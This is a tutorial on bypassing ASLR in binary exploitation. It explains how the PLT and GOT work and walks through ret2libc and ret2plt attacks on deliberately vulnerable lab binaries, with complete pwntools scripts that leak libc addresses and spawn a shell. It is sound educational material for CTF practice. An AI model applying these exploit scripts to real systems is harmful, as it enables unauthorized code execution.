
ASLR

Address Space Layout Randomisation

Overview

ASLR stands for Address Space Layout Randomisation and can, in most cases, be thought of as libc's equivalent of PIE - every time you run a binary, libc (and other libraries) get loaded into a different memory address.

While it's tempting to think of ASLR as libc PIE, there is a key difference.

ASLR is a kernel protection while PIE is a binary protection. The main difference is that PIE is compiled into the binary, while the presence of ASLR is completely dependent on the environment running the binary. If I compiled a binary on a machine with ASLR disabled and sent it to you, it wouldn't make any difference at all: if you have ASLR enabled, it still applies when you run the binary.
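Since ASLR belongs to the environment, it is worth checking what the machine you are testing on is actually doing. The following is a minimal sketch, assuming a Linux system that exposes the setting at /proc/sys/kernel/randomize_va_space; the function names are made up for illustration.

```python
from pathlib import Path
from typing import Optional

# Meanings of the values the Linux kernel uses for randomize_va_space.
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base, shared libraries and vDSO randomised",
    2: "as 1, plus the brk-managed heap",
}

def read_aslr_setting(path: str = "/proc/sys/kernel/randomize_va_space") -> Optional[int]:
    """Return the kernel's ASLR setting, or None if it cannot be read."""
    try:
        return int(Path(path).read_text().strip())
    except (OSError, ValueError):
        return None

def describe_aslr(setting: Optional[int]) -> str:
    """Turn the numeric setting into a short description."""
    if setting is None:
        return "unknown (not Linux, or the file is unreadable)"
    return ASLR_MODES.get(setting, f"unrecognised value {setting}")

if __name__ == "__main__":
    print("ASLR:", describe_aslr(read_aslr_setting()))
```

Nothing in the binary itself changes this value, which is exactly why a local exploit that hardcodes libc addresses tends to break on a remote target.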

Of course, as with PIE, this means you cannot hardcode values such as function addresses (e.g. system for a ret2libc).

The Format String Trap

It's tempting to think that, as with PIE, we can simply use a format string bug to leak a libc address off the stack and subtract a static offset from it. Sadly, we can't quite do that.

When functions finish execution, they do not get removed from memory; instead, they just get ignored and overwritten. Chances are very high that you will grab one of these remnants with the format string. Different libc versions can act very differently during execution, so a value you just grabbed may not even exist remotely, and if it does the offset will most likely be different (different libcs have different sizes and therefore different offsets between functions). It's possible to get lucky, but you shouldn't really hope that the offsets remain the same.

Instead, a more reliable way is reading the GOT entry of a specific function.

Double-Checking

For the same reason as PIE, libc base addresses always end in the hexadecimal characters 000.
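This check is easy to automate. The sketch below assumes 4 KiB pages and uses made-up offsets; in a real exploit the offset would come from the libc you believe the target is using.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages, the usual size on x86 Linux

def looks_like_base(address: int) -> bool:
    """A plausible base address is page-aligned, so its last three hex digits are 000."""
    return address % PAGE_SIZE == 0

system_leak = 0xf7de5f00      # an example leaked address of system
guessed_offset = 0x44f00      # hypothetical offset of system in the libc we think is in use
other_offset = 0x3d200        # hypothetical offset of system in some other libc version

for offset in (guessed_offset, other_offset):
    candidate = system_leak - offset
    print(hex(candidate), looks_like_base(candidate))
```

If the candidate base does not end in 000, either the leak was parsed incorrectly or the offset belongs to a different libc version.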

ASLR Bypass with Given Leak

The Source

#include <stdio.h>
#include <stdlib.h>

void vuln() {
    char buffer[20];

    printf("System is at: %lp\n", system);

    gets(buffer);
}

int main() {
    vuln();

    return 0;
}

void win() {
    puts("PIE bypassed! Great job :D");
}

Just as we did for PIE, except this time we print the address of system.

Analysis

$ ./vuln-32 
System is at: 0xf7de5f00

Yup, does what we expected.

Your address of system might end in different characters; that just means you have a different libc version.

Exploitation

Much of this is as we did with PIE.

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

Note that we include the libc here - this is just another ELF object that makes our lives easier.

Parse the address of system and calculate libc base from that (as we did with PIE):

p.recvuntil(b'at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')
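To see what those few lines are doing without pwntools, here is a rough standard-library sketch. The offsets are hypothetical stand-ins for what libc.sym[...] would return before the base is set, and the helper names are invented for illustration.

```python
def parse_leak(line: bytes) -> int:
    """Extract the hexadecimal address that follows 'at: ' in the program's output."""
    _, _, value = line.partition(b"at: ")
    return int(value.strip(), 16)

# Hypothetical offsets inside libc; real values depend on the libc version.
OFFSETS = {"system": 0x44f00, "exit": 0x37f80}

def rebase(leak: int, leaked_symbol: str) -> dict:
    """Compute libc base from one leaked symbol, then resolve every known symbol."""
    base = leak - OFFSETS[leaked_symbol]
    resolved = {name: base + offset for name, offset in OFFSETS.items()}
    resolved["base"] = base
    return resolved

addresses = rebase(parse_leak(b"System is at: 0xf7de5f00\n"), "system")
print({name: hex(value) for name, value in addresses.items()})
```

Setting libc.address in pwntools has the same effect as the rebase step here: every later lookup in libc.sym is already adjusted by the base.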

Now we can finally ret2libc, using the libc ELF object to really simplify it for us:

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvuntil(b'at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()

64-bit

Try it yourself :)

Using pwntools

If you prefer, you could have changed the following payload to be more pwntoolsy:

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

Instead, you could do:

binsh = next(libc.search(b'/bin/sh'))

rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)

p.sendline(rop.chain())

The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.

PLT and GOT

Bypassing ASLR

The PLT and GOT are sections within an ELF file that deal with a large portion of the dynamic linking. Dynamically linked binaries are more common than statically linked binaries in CTFs. The purpose of dynamic linking is that binaries do not have to carry all the code necessary to run within them - this reduces their size substantially. Instead, they rely on system libraries (especially libc, the C standard library) to provide the bulk of the functionality. For example, each ELF file will not carry its own version of puts compiled within it - it will instead dynamically link to the puts of the system it is on. As well as smaller binary sizes, this also means the user can continually upgrade their libraries, instead of having to redownload all the binaries every time a new version comes out.

So when it's on a new system, it replaces function calls with hardcoded addresses?

Not quite.

The problem with this approach is it requires libc to have a constant base address, i.e. be loaded in the same area of memory every time it's run, but remember that ASLR exists. Hence the need for dynamic linking. Due to the way ASLR works, these addresses need to be resolved every time the binary is run. Enter the PLT and GOT.

The PLT and GOT

The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.

When you call puts() in C and compile it as an ELF executable, the call does not go to puts() directly - instead, it gets compiled as a call to puts@plt. You can check this by disassembling the calling function in GDB.

Why does it do that?

Well, as we said, it doesn't know where puts actually is - so it jumps to the PLT entry of puts instead. From here, puts@plt does some very specific things:

If there is a GOT entry for puts, it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.

The GOT is a massive table of addresses; these addresses are the actual locations in memory of the libc functions. puts@got, for example, will contain the address of puts in memory. When the PLT gets called, it reads the GOT address and redirects execution there. If the address is empty, it coordinates with the ld.so (also called the dynamic linker/loader) to get the function address and stores it in the GOT.
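The resolve-once-then-cache behaviour described above can be modelled in a few lines. This is a deliberately simplified sketch: the addresses are made up, an "empty" GOT entry is modelled as a missing dictionary key, and resolve() merely stands in for ld.so.

```python
# Pretend libc: symbol name -> "real" address. The values are made up.
LIBC_SYMBOLS = {"puts": 0xf7e3a460, "system": 0xf7de5f00}

got = {}             # the GOT, filled in lazily
resolver_calls = []  # records each time the dynamic linker is consulted

def resolve(name: str) -> int:
    """Stand-in for ld.so looking a symbol up in the loaded library."""
    resolver_calls.append(name)
    return LIBC_SYMBOLS[name]

def call_via_plt(name: str) -> int:
    """Stand-in for name@plt: use the GOT entry if present, else resolve and store it."""
    if name not in got:
        got[name] = resolve(name)
    return got[name]

first = call_via_plt("puts")
second = call_via_plt("puts")
print(hex(first), hex(second), resolver_calls)
```

The second call never reaches the resolver, which is the point: once a function has been called, its GOT entry holds the real libc address and stays there for anyone who can read it.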

How is this useful for binary exploitation?

Well, there are two key takeaways from the above explanation:

Calling the PLT address of a function is equivalent to calling the function itself
The GOT contains the addresses of functions in libc, and the GOT is within the binary.

The use of the first point is clear - if we have a PLT entry for a desirable libc function, for example system, we can just redirect execution to its PLT entry and it will be the equivalent of calling system directly; no need to jump into libc.

The second point is less obvious, but debatably even more important. As the GOT is part of the binary, it will always be a constant offset away from the base. Therefore, if PIE is disabled or you somehow leak the binary base, you know the exact address that contains a libc function's address. If you perhaps have an arbitrary read, it's trivial to leak the real address of the libc function and therefore bypass ASLR.

Exploiting an Arbitrary Read

There are two main ways that I (personally) exploit an arbitrary read. Note that these approaches will cause not only the GOT entry to be returned but everything else until a null byte is reached as well, due to strings in C being null-terminated; make sure you only take the required number of bytes.
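A small simulation makes the null-byte behaviour concrete. The sketch below assumes a made-up 32-bit GOT layout and models puts as "read until the first null byte"; simulated_puts is an invented helper, not a real API.

```python
import struct

def simulated_puts(memory: bytes, offset: int) -> bytes:
    """Return what puts would print: bytes from offset up to the first null byte."""
    end = memory.index(b"\x00", offset)
    return memory[offset:end]

# A made-up 32-bit GOT: three resolved entries followed by a zero word.
got = struct.pack("<IIII", 0xf7e3a460, 0xf7e15b40, 0xf7dd1a10, 0)

printed = simulated_puts(got, 0)
wanted = printed[:4]   # only the first entry is the one we asked for
print(len(printed), wanted.hex())

# Caveat: an address whose lowest byte is 0x00 prints nothing at all.
unlucky = simulated_puts(struct.pack("<I", 0xf7de5f00), 0)
print(len(unlucky))
```

The last case is worth remembering: if the function you chose to leak happens to sit at an address containing a null byte, pick a different GOT entry.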

ret2plt

A ret2plt is a common technique that involves calling puts@plt and passing the GOT entry of puts as a parameter. This causes puts to print out its own address in libc. You then set the return address to the function you are exploiting in order to call it again, which enables you to send a second payload now that the libc address is known.

# 32-bit ret2plt
payload = flat(
    b'A' * padding,
    elf.plt['puts'],
    elf.symbols['main'],
    elf.got['puts']
)

# 64-bit
payload = flat(
    b'A' * padding,
    POP_RDI,
    elf.got['puts'],
    elf.plt['puts'],
    elf.symbols['main']
)

flat() packs all the values you give it with p32() and p64() (depending on context) and concatenates them, meaning you don't have to write the packing functions out all the time
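As a rough illustration of that packing, here is a standard-library stand-in. It is a sketch only: flat_sketch is an invented helper that covers just integers and byte strings, and every address and the padding length are hypothetical placeholders.

```python
import struct

def flat_sketch(*items, bits: int = 32) -> bytes:
    """Concatenate items, packing integers as little-endian words of the given size."""
    fmt = "<I" if bits == 32 else "<Q"
    out = b""
    for item in items:
        out += struct.pack(fmt, item) if isinstance(item, int) else item
    return out

PADDING = 32                 # hypothetical offset to the saved return address
PUTS_PLT = 0x08049030        # hypothetical addresses inside a non-PIE binary
PUTS_GOT = 0x0804c00c
MAIN = 0x080491b6
POP_RDI = 0x004011cb         # hypothetical 'pop rdi; ret' gadget for the 64-bit case

# 32-bit: arguments live on the stack, after the return address.
payload32 = flat_sketch(b"A" * PADDING, PUTS_PLT, MAIN, PUTS_GOT, bits=32)

# 64-bit: the first argument goes in rdi, so a gadget loads it before the call.
payload64 = flat_sketch(b"A" * PADDING, POP_RDI, PUTS_GOT, PUTS_PLT, MAIN, bits=64)

print(len(payload32), len(payload64))
```

The ordering difference between the two payloads is the calling convention, not anything flat() does; flat() only saves you from writing the packing calls by hand.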

%s format string

This has the same general theory but is useful when you have limited stack space or a ROP chain would alter the stack in such a way to complicate future payloads, for example when stack pivoting.

payload = p32(elf.got['puts'])      # p64() if 64-bit
payload += b'|'
payload += b'%3$s'                  # The third parameter points at the start of the buffer


# this part is only relevant if you need to call the function again

payload = payload.ljust(40, b'A')   # 40 is the offset until you're overwriting the instruction pointer
payload += p32(elf.symbols['main'])

# Send it off...

p.recvuntil(b'|')                   # This is not required
puts_leak = u32(p.recv(4))          # 4 bytes because it's 32-bit

Summary

The PLT and GOT do the bulk of dynamic linking
The PLT resolves actual locations in libc of functions you use and stores them in the GOT
- Next time that function is called, it jumps to the GOT and resumes execution there
Calling function@plt is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating libc base

ret2plt ASLR bypass

Overview

This time around, there's no leak. You'll have to use the ret2plt technique explained previously. Feel free to have a go before looking further on.

Analysis

We're going to have to leak the libc base somehow, and the only logical way is a ret2plt. We're not struggling for space as gets() takes in as much data as we want.

Exploitation

After all the basic setup, we want to send a payload that leaks the real address of puts. As mentioned before, calling the PLT entry of a function is the same as calling the function itself; if we point the parameter to the GOT entry, it'll print out its actual location. This is because string arguments in C are really pointers to where the string can be found, so pointing puts at the GOT entry (which we know the location of) makes it print the bytes stored there.

But why set the return address to main? Well, if we set the return address to junk, we'll leak the libc address but then the binary will crash; if we call main again, however, we essentially restart the binary - except we now know libc base, so this time around we can do a ret2libc.

Remember that the GOT entry won't be the only thing printed - puts, like most C functions that work on strings, prints until a null byte. This means it will keep on printing GOT addresses, but the only one we care about is the first one, so we grab the first 4 bytes and use u32() to interpret them as a little-endian number. After that we ignore the rest of the values as well as the "Come get me" printed by calling main again.
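The decoding step can be written out by hand to show what u32() is doing. This is a sketch with made-up bytes and a hypothetical offset for puts; in the real exploit the bytes come from the process and the offset from the libc ELF.

```python
import struct

def u32_sketch(data: bytes) -> int:
    """Interpret exactly 4 bytes as an unsigned little-endian integer, like pwntools' u32()."""
    return struct.unpack("<I", data)[0]

# Made-up output: the puts GOT entry, the next GOT entry, then the newline puts appends.
received = b"\x60\xa4\xe3\xf7" + b"\x40\x5b\xe1\xf7" + b"\n"

puts_leak = u32_sketch(received[:4])   # only the first 4 bytes matter
PUTS_OFFSET = 0x71460                  # hypothetical offset of puts within libc
libc_base = puts_leak - PUTS_OFFSET

print(hex(puts_leak), hex(libc_base))
```

Note how the bytes arrive in reverse order compared with how the address is written, and that the resulting base ends in 000, which is a quick sign that the leak and offset agree.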

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvline()        # just receive the first output

payload = flat(
    'A' * 32,
    elf.plt['puts'],
    elf.sym['main'],
    elf.got['puts']
)

p.sendline(payload)

puts_leak = u32(p.recv(4))
p.recvlines(2)

From here, we simply calculate libc base again and perform a basic ret2libc:

libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
    'A' * 32,
    libc.sym['system'],
    libc.sym['exit'],            # exit is not required here, it's just nicer
    next(libc.search(b'/bin/sh\x00'))
)

p.sendline(payload)

p.interactive()

And bingo, we have a shell!

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvline()

payload = flat(
    'A' * 32,
    elf.plt['puts'],
    elf.sym['main'],
    elf.got['puts']
)

p.sendline(payload)

puts_leak = u32(p.recv(4))
p.recvlines(2)

libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
    'A' * 32,
    libc.sym['system'],
    libc.sym['exit'],
    next(libc.search(b'/bin/sh\x00'))
)

p.sendline(payload)

p.interactive()

64-bit

You know the drill - try the same thing for 64-bit. If you want, you can use pwntools' ROP capabilities - or, to make sure you understand calling conventions, be daring and do both :P
